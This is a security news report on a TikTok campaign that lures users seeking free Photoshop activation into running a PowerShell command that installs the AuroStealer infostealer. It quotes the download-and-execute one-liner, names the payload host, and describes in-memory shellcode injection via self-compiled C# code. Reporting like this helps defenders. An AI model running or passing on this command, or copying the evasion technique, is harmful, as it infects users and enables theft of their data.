Cybercriminals are weaponizing TikTok videos to distribute sophisticated malware through a ClickFix-style social engineering campaign targeting users seeking free software activation.
Security researchers have identified multiple videos on the platform, some with over 500 likes, that lure victims with promises of free Photoshop activation.
The attack employs a multi-stage infection chain that delivers AuroStealer and uses advanced evasion techniques, including on-demand code compilation, to bypass security defenses.
The malicious campaign instructs victims to execute a PowerShell command as administrator: iex (irm slmgr[.]win/photoshop).
This one-liner downloads and executes the first-stage malicious PowerShell script (SHA256: 6D897B5661AA438A96AC8695C54B7C4F3A1FBF1B628C8D2011E50864860C6B23), which has a VirusTotal detection score of 17/63.
The script immediately downloads a second-stage payload, updater.exe, from hxxps://file-epq[.]pages[.]dev/updater.exe. Analysis confirms that updater.exe (SHA256: 58b11b4dc81d0b005b7d5ecae0fb6ddb3c31ad0e7a9abf9a7638169c51356fd8) is identified as AuroStealer malware designed to harvest sensitive information from compromised systems.
The malware establishes persistence through scheduled tasks that masquerade as legitimate Windows services, including MicrosoftEdgeUpdateTaskMachineCore, GoogleUpdateTaskMachineCore, AdobeUpdateTask, and WindowsUpdateCheck, randomly selecting names to avoid detection patterns.
The attack deploys a third payload, source.exe (SHA256: db57e4a73d3cb90b53a0b1401cb47c41c1d6704a26983248897edcc13a367011), which implements a sophisticated self-compiling technique.
The malware invokes the Windows C# compiler (csc.exe) located at C:WindowsMicrosoft.NETFramework64v4.0.30319csc.exe to compile malicious code directly on the victim’s machine during execution.
This compiled code creates a class that leverages Windows API functions, including VirtualAlloc, CreateThread, and WaitForSingleObject, to allocate memory, inject shellcode, and execute malicious payloads entirely in memory.
This technique significantly complicates detection efforts because the final malicious code does not exist in a compiled form on disk until runtime, allowing it to evade signature-based antivirus solutions and behavioral analysis systems.
Security researchers have discovered additional TikTok videos linked to the same campaign promoting fake activation tools for various popular software products.
Users should avoid executing PowerShell commands from untrusted sources, disable script execution unless necessary, and maintain updated endpoint protection.
Organizations should implement application whitelisting and monitor for suspicious csc.exe invocations that may indicate self-compiling malware activity.
Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates
